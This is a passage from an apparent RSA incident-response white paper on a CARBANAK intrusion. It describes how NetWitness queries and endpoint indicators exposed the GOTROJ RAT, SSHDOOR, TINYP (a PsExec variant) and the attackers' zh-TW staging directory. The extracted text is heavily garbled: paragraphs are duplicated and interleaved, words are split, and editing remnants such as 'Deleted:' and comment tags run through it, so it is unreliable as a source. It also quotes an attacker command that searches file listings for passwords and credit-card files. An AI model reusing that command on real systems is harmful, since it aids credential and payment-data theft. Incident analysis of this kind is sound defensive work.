filtering. In order to more accurately observe this communication, RSA IR created custom
content for RSA NetWitness Suite. This content is released in the form of the Digital Appendix
associated with this report. An example of the meta created for this communication is shown in
Figure 38.
Figure 38: GOTROJ Beacon Meta from Digital Appendix Content
As discussed
earlier
in this paper,
GOTROJ
has the
ability to
download
Figure
38: GOTROJ
Beacon
Meta
from Digital
Appendix
Content
files to compromised hosts. This ability does not traverse the binary XOR
encoded control channel of the GOTROJ. Instead, it utilizes HTTP over
As discussed earlier in this paper, the GOTROJ has the ability to !download The!Shadows!of!Ghosts!
files to compromised
443.
Thenot
following
subset
of the query
associated
with
Figure
33ofcan
Case!Study:!CARBANAK!
hosts. Thisport
ability
does
traverse
the binary
XOR encoded
control
channel
thebe
GOTROJ.
Instead, it used
utilizes
HTTP
over
TCP port 443. The following subset !of the query associated with
to find
this
traffic.
direction
outbound
service
80 && tcp.dstport = 443 && session.analysis =
direct to ip
Figure
33 =
be used &&
to find
this =
traffic.
direction = outbound &&http
service
= 80 && tcp.dstport = 443 &&
request
session.analysis =
direct to ip http request
This query returns the results shown in Figure 39.
This query returns the results shown in Figure 39.
Page 44
Figure 39: Identification of GOTROJ HTTP #wget User-Agent
Figure 39: Identification of GOTROJ HTTP #wget User-Agent
In Figure 39, an additional HTTP User-Agent is observed:
go-http-client/1.1.
The sessions
associated with this User-Agent are the sessions in which files were downloaded via the GOTROJ
Trojan. Adding this information to the query associated with Figure 33 returns the following:
WHITE PAPER
In Figure 39, an additional HTTP User-Agent is observed:
go-http-client/1.1.
The sessions associated with this User-Agent are the sessions in which files
were downloaded via the GOTROJ Trojan. Adding this information to the
query associated with Figure 33 returns the following:
direction = outbound && service = 80 && tcp.dstport = 443 && session.analysis =
direct to ip http request
&& client begins
wget
With these queries built around behavioral attacker TTPs, as observed during
the time of engagement, any reliance on traditional atomic indicators is
removed from the investigation. Instead, the actions required of the attackers
(such as operating system command execution and interaction, file download,
etc.) are focused upon, as well as the way that their TTP and toolsets perform
these actions. Thus any changes in C2, filenames, hashes, user-agents, etc., can
be quickly identified and included in the continuing investigation.
4.6.2 Host Visibility and Indicators
This section discusses the methodology and RSA NetWitness Endpoint
Instant IOCs (IIOCs) and content used by RSA IR during this investigation.
The methodology used in this section is described in detail in the RSA
NetWitness Endpoint User Guide found here.18
The CARBANAK actors involved during this engagement were particularly
careful to leave as little file, log or execution traces as possible. This included,
but was not limited to, ad hoc download of tools as needed, preference for
lateral tool movement, log deletion automatically built into tools, immediate
deletion of tools and logs upon logout of systems, and removal of entries from
centralized log repositories.
During this engagement, the RSA NetWitness Endpoint agent was deployed
to all Red Hat Enterprise Linux (RHEL) and CentOS 6 and 7 systems, as they
could support it. The detection of attacker activity on these systems within
RSA NetWitness Endpoint utilized aspects of the attacker actions and toolset
utilizations that deviated from legitimate installed binary usage. An example
of this is the usage of the AUDITUNNEL and the SSHDOOR client and server
binaries. Originally, the attackers placed the SSHDOOR binaries in /usr/bin
and /usr/sbin as a replacement for the system OpenSSH client and server
binaries. However, upon the remediation of system ALPHA, the attackers
utilized the SSHDOOR binaries in the non-standard location of /usr/share/
man/mann. The initial placement of SSHDOOR was observed by reviewing
any binaries automatically started as part of systemd or init.d, and had a hash
value that didn
t match the one in the RPM package list. These attributes
are recorded in the IIOCs of RSA NetWitness Endpoint and are shown in the
SSHDOOR detection in Figure 40.
RSA NetWitness Endpoint User Guide
; https://community.rsa.com/docs/DOC-72935
attacker activity on these systems within RSA NetWitness Endpoint utilized aspects of the
attacker actions and toolset utilizations that deviated from legitimate installed binary usage. An
WHITE PAPER
example of this is the usage of the AUDITUNNEL and the SSHDOOR client and server binaries
Originally, the attackers placed the SSHDOOR binaries in /usr/bin and /usr/sbin as a
replacement for the system OpenSSH client and server binaries. However, upon the remediation
of system ALPHA, the attackers utilized the SSHDOOR binaries in the non-standard location of
/usr/share/man/mann. The initial placement of SSHDOOR was observed by reviewing any
binaries automatically started as part of systemd or init.d, and had a hash value that didn
match the one in the RPM package list. These attributes are recorded in the IIOCs of RSA
NetWitness Endpoint and are shown in the SSHDOOR detection in Figure 40.
Figure 40: File Hash Mismatch and system/init.d Autostart in SSHDOOR Detection
Figure 40: File Hash Mismatch and system/init.d Autostart in SSHDOOR Detection
Once the attackers moved to a non-standard location, this was easily
identified,
as they
the only common
system
binaries
not running
Once the attackers
moved
to were
a non-standard
location,
thisservice
was easily
identified,
as they were
the only common
system
service
binaries
running
either
/sbin
/usr/sbin.
The aspects of
The!Shadows!of!Ghosts!
in either /sbin or /usr/sbin. The aspects of both instances of SSHDOOR use are
Case!Study:!CARBANAK!
both instances
SSHDOOR
illustrated
Figure
illustrated in Figure 41.
RSA NetWitness Endpoint User Guide
; https://community.rsa.com/docs/DOC-72935
Page 4
41: Malicious
Binary
in Non-Standard
Locations
and Without
FigureFigure
41: Malicious
Binary Usage
in Usage
Non-Standard
Locations and
Without Associated
Packages
Associated Packages
In Figure 41, we observe two separate sshd binaries running on the system. As SSH only
In Figure
41, we
separate
sshd
running
on the system.
requires
one instance
ofobserve
its service
binary
running
at binaries
a time, this
is an anomaly.
Add to this the
non-standard
location
/usr/share/man/mann
which
second
sshd
As SSH only requires one instance of its service binary runningisatexecuting,
a time, and the
fact that this binary cannot be associated with a legitimately installed RPM package, this activity
this is an
anomaly.
Addand
to this
the non-standard
of /usr/share/man/
immediately
becomes
suspect
warrants
investigation. location
The legitimate
sshd service binary
process
also
highlighted
running
from
/usr/sbin.
mann in which the second sshd is executing, and the fact that this binary
cannot be associated with a legitimately installed RPM package, this activity
Another method of identifying the attacker activity during this engagement involved the
command
line arguments
usedsuspect
by the attackers.
Essentially,
while theThe
attackers
couldsshd
change
immediately
becomes
and warrants
investigation.
legitimate
directory locations, filenames and even hashes, the base functionality of the tools themselves
service binary process is also highlighted as running from /usr/sbin.
could not readily or easily be changed. Given that the command line arguments of the tool
indicated the functionality being utilized, RSA IR analysts zeroed in on the unique command line
Another
method
of identifying
attacker
during
engagement
arguments
of the
tools being
use by thethe
attackers.
Asactivity
an example,
thethis
usage
of any web address
or IP address
inthe
the command
command line
immediately
suspect
and reviewed, as
involved
linearguments
argumentsbecame
used by
the attackers.
Essentially,
shown in Figure 42.
while the attackers could change directory locations, filenames and even
hashes, the base functionality of the tools themselves could not readily
or easily be changed. Given that the command line arguments of the tool
indicated the functionality being utilized, RSA IR analysts zeroed in on the
unique command line arguments of the tools being use by the attackers. As
an example, the usage of any web address or IP address in the command line
Figure
42: IP Address,
Port Switch
and Port
in Program
Arguments
arguments
became
immediately
suspect
and Number
reviewed,
as shown
in Figure 42.
As a follow-up to these findings, RSA IR analysts utilized some of the base functions of the RSA
NetWitness Endpoint agent in order to gain additional artifacts and information associated with
known indicators. During this engagement, the directory /usr/share/man/mann was the primary
working directory for system BRAVO. In using this indicator during scoping investigations, the
file contents for /usr/share/man/mann were requested from every Linux server in the
environment. The purpose of this was to determine if this directory was being maliciously used
on any systems within the environment and to gain additional evidence that may not have
executed during the agent
s tenure on the system.
requires one instance of its service binary running at a time, this is an anomaly. Add to this the
Deleted:
non-standard location of /usr/share/man/mann in which the second sshd is executing, and the
fact that this binary cannot be associated with a legitimately installed RPM package, WHITE
this activity
PAPER
immediately becomes suspect and warrants investigation. The legitimate sshd service binary
Deleted:
process is also highlighted as running from /usr/sbin.
Another method of identifying the attacker activity during this engagement involved the
command line arguments used by the attackers. Essentially, while the attackers could change
directory locations, filenames and even hashes, the base functionality of the tools themselves
could not readily or easily be changed. Given that the command line arguments of the tool
indicated the functionality being utilized, RSA IR analysts zeroed in on the unique command line
arguments of the tools being use by the attackers. As an example, the usage of any web address
or IP address in the command line arguments became immediately suspect and reviewed, as
shown in Figure 42.
Deleted:
Deleted: ,
Deleted:
Deleted:
Comment [
Figure
42: IP Address,
Switchand
and Port
in Program
Arguments
Figure 42:
IP Address,
PortPort
Switch,
PortNumber
Number
in Program
Arguments
As a follow-up to these findings, RSA IR analysts utilized some of the base functions of the RSA
As a follow-up
to agent
theseinfindings,
IR analysts
utilized
some ofassociated
the basewith
NetWitness
Endpoint
order to gain
additional
artifacts
and information
known indicators. During this engagement, the directory /usr/share/man/mann was the primary
functions
NetWitness
Endpoint
agent
order
gain
additional
working directory for system BRAVO. In using this indicator during scoping investigations, the
file
contents
for /usr/share/man/mann
were requested
from every
Linux server
in the
artifacts
information associated
with known
indicators.
During
this
environment. The purpose of this was to determine if this directory was being maliciously used
engagement,
directory
/usr/share/man/mann
primary
working
on any systems within the environment and to gain additional evidence that may not have
executed
during
the agent
tenure on
system.
directory
for system
BRAVO.
Inthe
using
this indicator during scoping
Deleted: ,
Deleted: an
Deleted: Ag
Deleted:
Deleted:
Deleted:
investigations, the file contents for /usr/share/man/mann were requested
from every Linux server in the environment. The purpose of this was to Page 47
determine if this directory was being maliciously used on any systems within
The!Shadows!of!G
the environment and to gain additional evidence that may not
! have executed
Case!Study:!CARB
during the agent
s tenure on the system.
Figure 43: RSA NetWitness Endpoint Request for All Files in Directory /usr/share/
man/mann
Figure 43: RSA NetWitness Endpoint Request for All Files in Directory /usr/share/man/mann
In requesting files for this directory across all systems, analysts are able to determine if the
In requesting files for this directory across all systems, analysts are able
are additional tools or malware artifacts used by the attackers within the same directory.
determine
there
are additional
tools
or malware
artifacts executing
used by
Additionally, this to
action
can if
also
determine
if the
binaries
observed
from this dire
attackers
within
same
directory.
Additionally,
this
action
also from the Glob
exist on any other systems. Both cases are shown in the results of thiscan
action
determine
binaries
observed executing from this directory exist on any
Downloads section
shown ifinthe
Figure
other systems. Both cases are shown in the results of this action from the
Global Downloads section shown in Figure 44.
WHITE PAPER
Figure 43: RSA NetWitness Endpoint Request for All Files in Directory /usr/share/man/mann
In requesting files for this directory across all systems, analysts are able to determine if there
are additional tools or malware artifacts used by the attackers within the same directory.
Additionally, this action can also determine if the binaries observed executing from this directory
exist on any other systems. Both cases are shown in the results of this action from the Global
Downloads section shown in Figure 44.
Dele
Dele
Figure
Additional
Findings
Mass
File Download
Directory /usr/
Figure
44:44:
Additional
Findings
via Mass
File
Download
Request forRequest
Directoryfor
/usr/share/man/mann
share/man/mann
The functionality is also useful in acquiring key host artifacts, such as configuration files and host
logs, across all systems within the environment and then processing and reviewing them in
The functionality
is also
in acquiring
keyand
host
artifacts,
such as
aggregate
in order to gain
moreuseful
contextual
information
situational
awareness.
configuration files and host logs, across all systems within the environment
While contextual forensic data within host artifacts could identify some attacker activity, much of
and then
processing
them
in aggregate
in order
gain
more on the
the most
commonly
utilizedand
hostreviewing
forensic data
either
was not useful
or wasto
available
hosts
affected
during
this
engagement.
While
aggregate
analysis
artifacts,
such
as NTFS
contextual information and situational awareness.
Page 48
While contextual forensic data within host artifacts could identify some
attacker activity, much of the most commonly utilized host forensic data
either was not useful or was not available on the hosts affected during this
engagement. While aggregate analysis of artifacts, such as NTFS Master File
Tables, AmCache, SYSTEM and SOFTWARE Registry Hives, and Windows
Event Logs, could identify certain aspects of the attackers
actions, they were
consistently ineffective at providing the necessary level of granularity to track
the attackers
actions appropriately. However, using the RSA NetWitness
Endpoint agent already present on the hosts to provide this critical host data,
the aforementioned artifacts became force multipliers by providing additional
context to the actions observed in RSA NetWitness Suite.
The attackers utilized a specific staging directory on each host in which they
took any significant action. In order to appear more legitimate to security
analysts and tools, they utilized the legitimate Microsoft Windows directory
for 32-bit applications utilizing the Taiwan Chinese language pack on 64-bit
versions of Windows, C:\Windows\SysWoW64\zh-TW. While this directory
is a legitimate Windows system directory, no server systems within this
environment were legitimately utilizing the Taiwan Chinese language directory.
As such, this became a useful and actionable IOC for scoping and tracking
any systems with substantial actor activity. An example of attacker use of this
directory, as observed in RSA NetWitness Endpoint, is shown in Figure 45.
Dele
providing the necessary level of granularity to track the attackers
actions appropriately.
Deleted: att
However, using the RSA NetWitness Endpoint agent already present on the hosts to provide this
Deleted:
critical host data, the aforementioned artifacts became force multipliers by providingWHITE
additional
PAPER Deleted: Age
context to the actions observed in RSA NetWitness Suite.
The attackers utilized a specific staging directory on each host in which they took any significant
action. In order to appear more legitimate to security analysts and tools, they utilized the
legitimate Microsoft Windows directory for 32-bit applications utilizing the Taiwan Chinese
language pack on 64-bit versions of Windows, C:\Windows\SysWoW64\zh-TW. While this
directory is a legitimate Windows system directory, no server systems within this environment
were legitimately utilizing the Taiwan Chinese language directory. As such, this became a useful
and actionable IOC for scoping and tracking any systems with substantial actor activity. An
example of attacker use of this directory, as observed in RSA NetWitness Endpoint, is shown in
Figure 45.
Comment [A
the overuse
Deleted:
Deleted:
Deleted:
Deleted:
Comment [A
Figure
C:\Windows\SysWOW64\zh-TW
WorkingUIAutomationCore
Directory, UIAutomationCore
Figure45:
45: C:\Windows\SysWOW64\zh-TW
Working Directory,
WGET Usage, and
TINYP Download and Renaming
WGET Usage, and TINYP Download and Renaming
In Figure 45 above, the usage of the UIAutomationCore.dll.bin WGET binary to download
attacker tools and the immediate renaming of those tools are shown. This, again, became an
In Figure 45 above, the usage of the UIAutomationCore.dll.bin WGET binary
excellent actionable IOC to track adversary activity. The same contextual aspects that were
utilized
in the network
IOC tools
for WGET
in Figure 33 are
also usedof
here.
By identifying
to download
attacker
andusage
the immediate
renaming
those
tools areany
command executions that utilize a command line argument of
http://
followed by an IP
shown. RSA
This,IRagain,
became
anany
excellent
actionable
IOCthe
toattackers
track adversary
address,
was able
to identify
and all instances
in which
downloaded
tools. In hunting for this activity, we use the same methodology used in Section 3.3.1,
activity. The same contextual aspects that were utilized in the network IOC
identifying aspects of the activity associated with IIOCs and reviewing those IIOCs for activity.
case, the
UIAutomationCore.dll.bin
WGET
binary
download
is an unsigned
forthis
WGET
usage
in Figure 33 are also
used
here.
By identifying
anymodule,
command
located within a legitimate Windows directory, communicates to an external source directly to IP
executions
that an
utilize
a command
lineIIOCs
argument
http://
followed
address
and writes
executable
to disk. The
shown inof
Figure
46 reflect
this activity.
Deleted:
Deleted:
Deleted: is
Deleted:
Deleted:
Deleted: Ins
Deleted: Ins
Deleted:
Deleted: ,
an IP address, RSA IR was able to identify any and all instances in which
Deleted:
Deleted: Ins
the attackers downloaded tools. In hunting for this activity, we use the
same methodology used in Section 3.3.1, identifying aspects of the activity
associated with IIOCs and reviewing those IIOCs for activity. In this case,
the UIAutomationCore.dll.bin WGET binary download is an unsigned module,
located within a legitimate Windows directory, communicates to an external
The!Shadows!of!Ghosts!
source directly to IP address and writes an executable to! disk. The IIOCs
Case!Study:!CARBANAK!
shown in Figure 46 reflect this activity.
Page 49
Figure
46:Representing
Instant IOCs UIAutomationCore.dll.bin
Representing UIAutomationCore.dll.bin
Figure 46:
IIOCs
WGET Binary Activity
WGET Binary Activity
As stated in the section associated with Table 15, the TINYP binary is a modification of the
SysInternals PSEXEC remote access utility. Just like PSEXEC, the TINYP binary sends a service
As stated in the section associated with Table 15, the TINYP binary is a
binary to the ADMIN$ share (C:\Windows) of the target host. The target host executes this
modification
the SysInternals
PSEXEC
remote
access
utility.
Just
like
service binary,
and the of
TINYP
tool connects
to that
service
binary.
When
identifying
attacker
PSEXEC,
the TINYP
binary sends
a service
to the ADMIN$
share (C:\
lateral movement
from
the perspective
of the
targetbinary
system,
PSEXESVC.exe
TINYP service
binary executes
the remote
command
attacker
system.
viewand
of this
Windows)
of the target
host. requested
The target by
host
executes
this
serviceThe
binary,
activity in RSA NetWitness Endpoint is illustrated in Figure 47.
the TINYP tool connects to that service binary. When identifying attacker
lateral movement from the perspective of the target system, the PSEXESVC.
exe TINYP service binary executes the remote command requested by the
attacker system. The view of this activity in RSA NetWitness Endpoint is
illustrated in Figure 47.
WHITE PAPER
Figure 46: IIOCs Representing UIAutomationCore.dll.bin WGET Binary Activity
As stated in the section associated with Table 15, the TINYP binary is a modification of the
SysInternals PSEXEC remote access utility. Just like PSEXEC, the TINYP binary sends a service
binary to the ADMIN$ share (C:\Windows) of the target host. The target host executes this
service binary, and the TINYP tool connects to that service binary. When identifying attacker
lateral movement from the perspective of the target system, the PSEXESVC.exe TINYP service
binary executes the remote command requested by the attacker system. The view of this
activity in RSA NetWitness Endpoint is illustrated in Figure 47.
Deleted: Inst
Deleted:
Deleted:
Deleted:
Deleted:
Figure 47:
TINYP
Execution
from
(Red)
Target
Perspective
Figure
47: TINYP
Execution
from Source
Source (Red)
andand
Target
(Blue)(Blue)
Perspective
Figure 47 illustrates the most common use case for the TINYP binary observed: lateral
Figure
47via
illustrates
the most
case
forabove,
the TINYP
binary
movement
remote command
shellcommon
execution.use
In the
figure
the source
host
perspective of TINYP execution is shown in the red boxes, while the target host perspective of
observed:
lateral
movement
remote
command
shell
execution.
In the
TINYP execution is shown in the blue boxes. In the box labeled
we see file PSEXESVC.exe
service binary
the C:\Windows
directory,
which execution
represents the
ADMIN$ in the
figure
above,being
thewritten
sourcetohost
perspective
of TINYP
is shown
SMB/CIFS network share. Once the service binary is placed in the ADMIN$ share, a Windows
boxes,
while
target
host
perspective
TINYP
execution
is shown in
Registry entry is created in the SYSTEM Registry Hive under the path
HKLM\SYSTEM\ControlSet001\services\PSEXESVC. Once the service binary is placed on the
blue boxes. In the box labeled
we see file PSEXESVC.exe service binary
system, a Windows Service is created to execute the service binary. This is observed in the last
being written to the C:\Windows directory, which represents the ADMIN$Page 50
SMB/CIFS network share. Once the service binary is placed in the ADMIN$
share, a Windows Registry entry is created in the SYSTEM Registry Hive under
the path HKLM\SYSTEM\ControlSet001\services\PSEXESVC. Once the service
binary is placed on the system, a Windows Service is created to execute the
service binary. This is observed in the last item in box
as the Windows
Services Control Manager services.exe executes the PSEXESVC.exe process.
Upon the second execution of the TINYP binary, the Windows SYSTEM
Registry Key is not created, as it already exists on the system, and it is
important to note that the Registry entry is only created on the first
execution. This information can be used to determine the first host access
by this method. On the second execution, represented by the box labeled
we see the Windows Local Security Authentication Server binary lsass.
exe opening the PSEXESVC.exe service process. This is the actor attempting
to authenticate to the remote system under whatever credentials they have
acquired. Once authenticated, the process goes into the box labeled
where the PSEXESVC.exe service binary executes the Windows Command
Processor cmd.exe remotely on behalf of the attacker. It is important to note
that while the calling parent binary on the target system is the TINYP binary
ps.exe, all actions executed by TINYP will be carried out by the PSEXESVC.
exe service binary on the target system. Given this, we can identify remote
command shell execution via PSEXEC for any instance in which PSEXESVC.exe
Creates Process cmd.exe, which we established was the primary use case for
this tool in this engagement.
Knowing this, and knowing that the legitimate PSEXEC utility is often widely
used by system administrators, the difference in the legitimate PSEXEC and
the TINYP binaries or their service binaries is particularly useful to incident
responders. In reviewing the service binaries of both tools in RSA NetWitness
Endpoint, we identify differences we can use to distinguish between legitimate
and malicious activity. A view of one difference is shown in Figure 48.
Deleted:
Deleted:
Deleted: ,
Deleted:
Deleted:
Deleted:
whatever credentials they have acquired. Once authenticated, the process goes into the box
Deleted:
labeled
where the PSEXESVC.exe service binary executes the Windows Command Processor
Deleted: ,
cmd.exe remotely on behalf of the attacker. It is important to note that while the calling parent
WHITE PAPERDeleted:
binary on the target system is the TINYP binary ps.exe, all actions executed by TINYP will be
carried out by the PSEXESVC.exe service binary on the target system. Given this, we can
Deleted:
identify remote command shell execution via PSEXEC for any instance in which PSEXESVC.exe
Creates Process cmd.exe, which we established was the primary use case for this tool in this
engagement.
Knowing this, and knowing that the legitimate PSEXEC utility is often widely used by system
administrators, the difference in the legitimate PSEXEC and the TINYP binaries or their service
binaries is particularly useful to incident responders. In reviewing the service binaries of both
tools in RSA NetWitness Endpoint, we identify differences we can use to distinguish between
legitimate and malicious activity. A view of one difference is shown in Figure 48.
Deleted: and
Deleted:
Deleted:
Comment [A6
Figure
TINYPvs
vs.PSEXEC
PSEXEC Service
Binaries
Figure
48:48:
TINYP
Service
Binaries
In Figure 48, we see that the PSEXESVC.exe service binary used by TINYP has a valid Microsoft
Figurethough
48, weit see
that40KB
the smaller
PSEXESVC.exe
servicePSEXEC
binaryservice
used binary.
by TINYP
signature,
is about
than the legitimate
Whilehas
signature for this binary is valid, even valid information can become an actionable IOC. In this
aparticular
valid Microsoft
signature, though it is about 40KB smaller than the legitimate
engagement, the version of PSEXEC that was legitimately being used by system
administrators
was signed
byWhile
SysInternals,
much like the
above. With
this being
case,
PSEXEC
service
binary.
the signature
for figure
this binary
is valid,
eventhe
valid
any PSEXESVC service binaries that were Microsoft signed became immediately suspect during
information
canAdditionally,
become an
IOC.
this
particular
engagement,
this investigation.
theactionable
TINYP binary
itselfInwas
unsigned,
standing
in stark
difference from its legitimate PSEXEC counterpart. The differences in these binaries are shown in
version
PSEXEC
that
legitimately
being
used
system
administrators
Figure 49.
was signed by SysInternals, much like the figure above. With this being the
case, any PSEXESVC service binaries that were Microsoft signed became
immediately suspect during this investigation. Additionally, the TINYP binary
itself was unsigned, standing in stark difference from !its legitimate
PSEXEC
Page 51
The!Shadows!of!Ghosts!
Case!Study:!CARBANAK!
counterpart. The differences in these binaries are shown in Figure 49.
Deleted:
Deleted:
Deleted:
Deleted:
Deleted:
Comment [A
FigureFigure
49: TINYP
vs.vs.PSEXEC
Module
Differences
49: TINYP
PSEXEC
Module Differences
Deleted:
In Figure 49, we observe the following differences in the TINYP binary and legitimate PSEXEC:
In Figure 49, we observe the following differences in the TINYP binary and
1.! The TINYP
binary resides within a consistent directory of C:\Windows\SysWOW64\zh-TW.
legitimate
PSEXEC:
2.! The TINYP binary has a very recent compile time from the time of initial entry into the
environment.
1. The
TINYP binary resides within a consistent directory of C:\Windows\
3.! The TINYP binary has no value in the Description section of its header.
SysWOW64\zh-TW.
The TINYP binary is not signed.
Given
this,
shouldbinary
the attackers
filenamecompile
or location,
thisfrom
can bethe
hunted
viewing
2. The
TINYP
has achange
very recent
time
timeforofbyinitial
only unsigned binaries with no Description values and sorted by compile time to identify binaries
entrywithin
into the
compiled
closeenvironment.
proximity to the compile time of this binary.
3.order
The TINYP
no value
the Description
of its header.
to reducebinary
time to has
detection
of thisin
activity,
IIOC content section
for RSA NetWitness
Endpoint
has been created and included in the Digital Appendix associated with this document.
Deleted: Inst
4. The TINYP binary is not signed.
The majority of the attackers
actions-on-objective were conducted using commands residing
within, and are functions of, the Windows Command Processor cmd.exe. While there are a
Given
this,
shouldavailable
the attackers
change
filename
or location,
cansubset
be of
variety of
commands
to users at
the Windows
Command
Prompt, athis
specific
these commands are internal to the cmd.exe binary and therefore will not cause additional
hunted
for by viewing only unsigned binaries with no Description values and
process creation. These commands are listed in Table 25.
sorted by compile time to identify binaries compiled within close proximity to
the compile time of this binary.
Internal Windows Command Processor Commands
ASSOC
MKLINK
(vista IIOC
and above)
order to reduce time to detection of this
activity,
content for RSA
BREAK
MOVE
NetWitness
Endpoint has been created PATH
and included in the Digital Appendix
CALL
CD/CHDIR
PAUSE
associated
with
this
document.
POPD
COLOR
PROMPT
TITLE
COPY
PUSHD
majority of the attackers
actions-on-objective
were conducted using
DATE
commands
residing within, and are functions
of, the Windows Command
REN/RENAME
RD/RMDIR
Processor
cmd.exe. While there are a variety
of commands available to users
DPATH
the Windows Command Prompt, a specific
subset of these commands are
ECHO
SETLOCAL
ENDLOCAL
SHIFT
internal
cmd.exe
binary
therefore
will
not cause additional process
ERASE
START
EXIT
TIME
creation. These commands are listed in Table 25.
Page 52
Deleted:
Deleted: ,
Deleted: ,
Deleted:
Comment [A
WHITE PAPER
Internal Windows Command Processor Commands
ASSOC
MKLINK (vista and above)
BREAK
MOVE
CALL
PATH
CD/CHDIR
PAUSE
POPD
COLOR
PROMPT
COPY
PUSHD
DATE
REN/RENAME
RD/RMDIR
DPATH
ECHO
SETLOCAL
ENDLOCAL
SHIFT
ERASE
START
EXIT
TIME
TITLE
FTYPE
TYPE
GOTO
VERIFY
KEYS
MD/MKDIR
Table 25: List of Commands Internal to the Windows Command Processor
Throughout this engagement, the primary attacker actions consisted of
traversing directories and outputting files, looking for files that may contain
additional credentials, database information, internal infrastructure
documentation, and financial data such as PCI data. The majority of the
commands utilized consisted of the CD, TYPE, ECHO, DATE and DIR. As none
of these commands call additional binaries, the attackers would reside almost
completely within the cmd.exe process for the majority of their host actions.
Four distinct external commands were utilized by the attackers in traversing
the host filesystems as part of their internal reconnaissance activities: net.exe,
ipconfig.exe, find.exe and qwinsta.exe. Knowing this, any time cmd.exe called any
of these binaries, it was considered suspect activity. However, two of these
commands were specific to the actor activity and were thereby utilized as a
high-fidelity indication of attacker activity. The find.exe command searches
a specified file or piped input for a defined string given in the command
arguments, much like the grep binary does on Linux and UNIX hosts. The
attackers would use this binary in the following command string
dir /b /s 2>nul | find /I
phrase
KEYS
MD/MKDIR
Table 25: List of Commands Internal to the Windows Command Processor
WHITE PAPER
Throughout this engagement, the primary attacker actions consisted of traversing directories
and outputting files, looking for files that may contain additional credentials, database
information, internal infrastructure documentation, and financial data such as PCI data. The
majority of the commands utilized consisted of the CD, TYPE, ECHO, DATE and DIR. As none of
these commands call additional binaries, the attackers would reside almost completely within the
cmd.exe process for the majority of their host actions. Four distinct external commands were
utilized by the attackers in traversing the host filesystems as part of their internal
reconnaissance activities: net.exe, ipconfig.exe, find.exe and qwinsta.exe. Knowing this, any
time cmd.exe called any of these binaries, it was considered suspect activity. However, two of
these commands were specific to the actor activity and were thereby utilized as a high-fidelity
indication of attacker activity. The find.exe command searches a specified file or piped input for
where the
phrase
would be a string of interest to the attackers, such as
a defined string given in the command arguments, much like the grep binary does on Linux and
UNIX
The attackers
use this
binary
in the
following command
string
PCI,
hosts.
Passwords
andwould
Credit
Card.
This
command
would list
the filenames
of all files in all subdirectories
present
working directory, and then
dir /bunder
/s 2>nul
| find
phrase
only display the ones with the required string in the filename. Since the DIR
where the
phrase
would be a string of interest to the attackers, such as
PCI,
Passwords
Credit Card.
This
would list
the filenames
of all files but
in allthe
subdirectories
under
command
is part
ofcommand
the Windows
Command
Processor,
FIND command
the present working directory, and then only display the ones with the required string in the
is a separate
binary,
we observe
this
activity
in RSA
NetWitness
filename.
Since the
DIR command
is part
of the
Windows
Command
Processor, Endpoint
but the FIND
command is a separate binary, we observe this activity in RSA NetWitness Endpoint via the
cmd.exe
process
calling
find.exe
with
arguments,
illustrated
Figure
cmd.exe process calling find.exe with arguments, as illustrated in Figure 50.
Deleted: ,
Deleted:
Deleted: ,
Deleted:
Deleted:
Deleted: ,
Deleted:
Deleted:
Deleted:
Deleted:
Deleted: ,
Deleted: ,
Deleted: .
Deleted:
Comment [A
Figure 50:
cmd.exe
Calling
find.exe
Piped
Directory
Listing
Figure
50: cmd.exe
Calling
find.exe as
as aaPiped
Directory
Listing
Search Search
The qwinsta.exe binary identifies all currently logged-in users via command line session, console
The qwinsta.exe binary identifies all currently logged-in users via command
session or RDP session, and displays the user logged in and the type of session they are
associated
with.console
The attackers
would
thissession,
for two primary
functions the
on the
majority
of hosts
line session,
session
oruse
and displays
user
logged
they interacted with. The first would be to check other users logged in to the system as a
in and the
type of ifsession
theywas
arebeing
associated
would
monitor
to determine
their activity
detected,with.
and also
to attackers
identify administrative
users logged in whose credentials they could harvest from memory. The second was to identify
this
primary
functions
majority
hosts
they
interacted
what systems users were engaging the system with, and what method of access they were
with. The first would be to check other users logged in to the system as a
Page 53
monitor to determine if their activity was being detected, and also to identify
administrative users logged in whose credentials they could harvest from
memory. The second was to identify what systems users were engaging
the system with, and what method of access they were using. This gave the
attackers additional information with which to map the internal systems
The!Shadows!of!Ghosts!
and networks. Additionally, the attackers were the only
executing this
! users Case!Study:!CARBANAK!
command anywhere within the environment, as the system
administrators
using. This gave the attackers additional information with which to map the internal systems and
did not
use this command
in any
their
Thisanywhere
networks.
Additionally,
the attackers
wereofthe
onlyadministrative
users executingfunctions.
this command
within
the environment,
as the allowed
system administrators
did not
use this
command
in any of their
contextual
information
RSA IR to utilize
these
IOCs
with significant
administrative functions. This contextual information allowed RSA IR to utilize these IOCs with
effectiveness
during
thethe
course
ofofthe
Anexample
exampleofofthis
this
significant
effectiveness
during
course
theengagement.
engagement. An
activity is
shown
in Figure
activity
is shown
in Figure 51.
Deleted: log
Deleted: ,
Deleted:
Deleted:
Deleted:
Delet
Delet
Delet
Delet
Figure
qwinsta.exe
BeingCalled
Called
cmd.exe
Figure
qwinsta.exe Being
byby
cmd.exe
The GOTROJ RAT used by the attackers in this engagement was primarily
The GOTROJ RAT used by the attackers in this engagement was primarily utilized by installing it
installing
it asthe
a Windows
starting
the service
andTrojan
then was
as a utilized
Windowsby
Service,
starting
service andService,
then deleting
the service
once the
executing
successfully
in memory.
Evidence
thisexecuting
activity, assuccessfully
observed in Application
Tracking
deleting
the service
once the
Trojanofwas
in memory.
within RSA NetWitness Endpoint, is shown in Figure 52 and Figure 53.
Evidence of this activity, as observed in Application Tracking within RSA
NetWitness Endpoint, is shown in Figure 52 and Figure 53.
Figure 52: Installation of GOTROJ RAT Via Windows Service
Comm
refere
refere
unde
Delet
Delet
Comm
WHITE PAPER
Figure
Figure 51:
51: qwinsta.exe
qwinsta.exe Being
Being Called
Called by
by cmd.exe
cmd.exe
The GOTROJ
GOTROJ RAT
RAT used
used by
by the
the attackers
attackers in
in this
this engagement
engagement was
was primarily
primarily utilized
utilized by
by installing
installing it
as a
a Windows
Windows Service,
Service, starting
starting the
the service
service and
and then
then deleting
deleting the
the service
service once
once the
the Trojan
Trojan was
executing
executing successfully
successfully in
in memory.
memory. Evidence
Evidence of
of this
this activity,
activity, as
as observed
observed in
in Application
Application Tracking
Tracking
within
within RSA
RSA NetWitness
NetWitness Endpoint,
Endpoint, is
is shown
shown in
in Figure
Figure 52
52 and
and Figure
Figure 53.
Comment
Comment [A
reference GO
reference
referenced
referenced e
understood
understood
Deleted: ,,
Deleted:
Deleted:
Deleted:
Comment
Comment [A
Figure
GOTROJ
Windows
Service
Figure
52: Installation
Installation
GOTROJ RAT
ViaVia
Windows
ServiceService
Figure 52:
Installation
of of
GOTROJ
